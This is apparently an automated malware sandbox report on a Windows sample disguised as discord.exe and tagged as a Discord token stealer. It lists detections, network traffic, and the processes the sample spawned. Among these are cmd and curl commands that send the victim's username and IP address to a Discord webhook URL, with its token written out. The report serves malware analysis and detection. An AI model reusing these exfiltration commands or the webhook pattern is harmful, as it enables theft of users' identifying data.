Windows Analysis Report
discord.exe

Overview

General Information

Sample Name: discord.exe
Analysis ID: 575228
MD5: 0119d6972125a7955e886c8f127c07d0
SHA1: 6c3ea968a773e4019e8e3d097c1b4c6419a26fa0
SHA256: 91d204953e7765aab2777ebdddc20cb4057624dfc2cd8e0fa524626a7953cb65
Tags: 64, Discord, DiscordStealer, exe, Stealer, Win64

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Sigma detected: Suspicious Curl File Upload
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found large amount of non-executed APIs
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

Classification

[Classification chart: axes Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale clean, suspicious, malicious]

AV Detection

Source: discord.exe Avira: detected
Source: discord.exe Virustotal: Detection: 52%
Source: discord.exe Metadefender: Detection: 29%
Source: discord.exe ReversingLabs: Detection: 64%
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.128.64.141:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: discord.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: C:\Users\Andrew\Desktop\tokengrabber\x64\Release\c++ tokengrabber.pdb source: discord.exe
Source: Binary string: C:\Users\Andrew\Desktop\tokengrabber\x64\Release\c++ tokengrabber.pdb(( source: discord.exe
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED43118C FindClose,terminate,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_00007FF6ED43118C
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View IP Address: 23.128.64.141
Source: Joe Sandbox View IP Address: 162.159.135.233
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: discord.exe, 00000000.00000002.690845837.0000017E1ABB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: curl.exe, 00000008.00000002.689618766.000001D924C30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuR
Source: curl.exe, 00000008.00000002.689618766.000001D924C30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg
Source: curl.exe, 00000008.00000002.689640955.000001D924C4F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.689253787.000001D924C4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpgMONET
Source: curl.exe, 00000004.00000002.682520191.00000141970E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000002.689618766.000001D924C30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpghttps://discordapp.com/api/we
Source: discord.exe, 00000000.00000002.690591140.00000027802F7000.00000004.00000010.00020000.00000000.sdmp, discord.exe, 00000000.00000002.690765568.0000017E1AB7B000.00000004.00000020.00020000.00000000.sdmp, discord.exe, 00000000.00000002.690723755.0000017E1AB49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ip4.seeip.org
Source: discord.exe, 00000000.00000002.690902486.0000017E1ABE6000.00000004.00000020.00020000.00000000.sdmp, discord.exe, 00000000.00000002.690765568.0000017E1AB7B000.00000004.00000020.00020000.00000000.sdmp, discord.exe, 00000000.00000002.690717552.0000017E1AB41000.00000004.00000020.00020000.00000000.sdmp, discord.exe, 00000000.00000002.690723755.0000017E1AB49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ip4.seeip.org/
Source: discord.exe, 00000000.00000002.690723755.0000017E1AB49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ip4.seeip.org/.o
Source: discord.exe, 00000000.00000002.690902486.0000017E1ABE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ip4.seeip.org/:5
Source: discord.exe, 00000000.00000002.690591140.00000027802F7000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://ip4.seeip.orgc
Source: unknown DNS traffic detected: queries for: discordapp.com
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED425C6A InternetOpenUrlA,InternetReadFile,InternetCloseHandle, 0_2_00007FF6ED425C6A
Source: global traffic HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: IP retriever
    Host: ip4.seeip.org
    Cache-Control: no-cache
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED42E2C0 0_2_00007FF6ED42E2C0
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED42C960 0_2_00007FF6ED42C960
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED42ADE0 0_2_00007FF6ED42ADE0
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED4247AC 0_2_00007FF6ED4247AC
Source: discord.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\discord.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\discord.exe "C:\Users\user\Desktop\discord.exe"
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --data "username=your mum is a sex offender&content=```username: user```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl --data "username=your mum is a sex offender&content=```username: user```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx
Source: C:\Users\user\Desktop\discord.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --data "username=your mum is a sex offender&content=```ipaddres: 102.129.143.61```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl --data "username=your mum is a sex offender&content=```ipaddres: 102.129.143.61```&avatar_url=https://i.pinimg.com/236x/99/c8/8f/99c88f80f5080c31ddbb817e7ab3c8c3.jpg" https://discordapp.com/api/webhooks/847886908243968030/f8jDMCnyxM4jMZoIYouO4QEClASjQBwM3c-Dlj2_JnPuRr74qYdo8Fz2ybK8ieHzPhdx
Source: C:\Users\user\Desktop\discord.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_01
Source: C:\Users\user\Desktop\discord.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\OFTXDLKO.txt
Source: classification engine Classification label: mal56.winEXE@10/4@3/3
Source: C:\Users\user\Desktop\discord.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\curl.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: discord.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: discord.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: discord.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: discord.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: discord.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: discord.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: discord.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\discord.exe API coverage: 4.7 %
Source: curl.exe, 00000008.00000003.689418956.000001D924C40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll7
Source: discord.exe, 00000000.00000002.690723755.0000017E1AB49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: discord.exe, 00000000.00000002.690818333.0000017E1AB9C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: curl.exe, 00000004.00000002.682532661.00000141970F2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.682298316.00000141970EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED431E48 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6ED431E48
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED4316E8 SetUnhandledExceptionFilter,_set_new_mode, 0_2_00007FF6ED4316E8
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED431B64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF6ED431B64
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED431FF0 SetUnhandledExceptionFilter, 0_2_00007FF6ED431FF0
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED431D28 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF6ED431D28
Source: C:\Users\user\Desktop\discord.exe Code function: 0_2_00007FF6ED425300 GetUserNameA, 0_2_00007FF6ED425300